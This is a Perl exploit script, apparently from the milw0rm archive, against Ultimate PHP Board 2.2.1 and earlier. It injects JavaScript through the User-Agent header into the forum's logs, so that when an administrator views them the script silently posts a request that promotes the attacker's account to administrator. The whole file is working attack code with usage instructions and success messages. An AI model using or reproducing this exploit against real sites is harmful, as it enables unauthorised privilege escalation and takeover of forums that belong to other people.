92 lines
No EOL
3 KiB
Perl
Executable file
92 lines
No EOL
3 KiB
Perl
Executable file
#!/usr/bin/perl -w
|
|
# ------------------------------------------------------------------
|
|
# Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit
|
|
# ------------------------------------------------------------------
|
|
# by athos - staker[at]hotmail[dot]it
|
|
# download on http://www.myupb.com/
|
|
# ------------------------------------------------------------------
|
|
# Usage:
|
|
# perl xpl.pl host path id email
|
|
# perl xpl.pl localhost/upb 21 root@r00x.com
|
|
# ------------------------------------------------------------------
|
|
# Note: don't add me on msn messenger
|
|
# thanks evilsocket
|
|
# thanks meh for ajax code
|
|
# my email staker.38@gmail.com
|
|
# ------------------------------------------------------------------
|
|
|
|
use strict;
|
|
use IO::Socket;
|
|
|
|
my ($host,$path,$id,$email) = @ARGV;
|
|
|
|
|
|
if (@ARGV != 4) {
|
|
|
|
print "\n+--------------------------------------------------------------------+\r".
|
|
"\n| Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit |\r".
|
|
"\n+--------------------------------------------------------------------+\r".
|
|
"\n(user -> admin xpl )by athos - staker[at]hotmail[dot]it\n".
|
|
"\nUsage + perl $0 [host] [path] [ID] [email]".
|
|
"\nHost + localhost".
|
|
"\nPath + forum path /upb)".
|
|
"\nID + your user ID".
|
|
"\nEmail + your/any email\n";
|
|
exit;
|
|
}
|
|
|
|
&exploit();
|
|
|
|
|
|
sub exploit () {
|
|
|
|
my $content = undef;
|
|
my $uagent = &logs;
|
|
my $packet = undef;
|
|
my $socket = new IO::Socket::INET(
|
|
PeerAddr => $host,
|
|
PeerPort => 80,
|
|
Proto => 'tcp',
|
|
) or die $!;
|
|
|
|
$packet .= "GET /$path/index.php HTTP/1.1\r\n";
|
|
$packet .= "Host: $host\r\n";
|
|
$packet .= "User-Agent: $uagent\r\n";
|
|
$packet .= "Connection: close\r\n\r\n";
|
|
|
|
$socket->send($packet);
|
|
|
|
while (<$socket>) {
|
|
$content .= $_;
|
|
}
|
|
|
|
if ($content =~ m/myUPB/i) {
|
|
print "Exploit Done!\n";
|
|
print "You'll become admin when the real admin will visit the logs\n";
|
|
exit;
|
|
}
|
|
else {
|
|
print "Exploit Failed!\n";
|
|
exit;
|
|
}
|
|
}
|
|
|
|
|
|
sub logs () {
|
|
|
|
my $logs = "Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d".
|
|
"<script>var xplurl='http://$host/$path/admin_members.php?a".
|
|
"ction=edit&id=$id&page=10'; var xpldata='a=1&level=3&email".
|
|
"=$email&status&location&website&avatar&msn&yahoo&icq&sig&u_".
|
|
"timezone=0&B1=Submit';function s(s){var h=((window.ActiveXO".
|
|
"bject)?new ActiveXObject('Microsoft.XMLHTTP'):new XMLHttp".
|
|
"Request());h.open('POST', xplurl, true);h.setRequestHeader".
|
|
"('Content-type','application/x-www-form-urlencoded');h.setRe".
|
|
"questHeader('Content-length',xpldata.length);h.setRequestHea".
|
|
"der('Connection','close');h.send(xpldata);}s();</script>";
|
|
|
|
return $logs;
|
|
|
|
}
|
|
|
|
# milw0rm.com [2008-12-29] |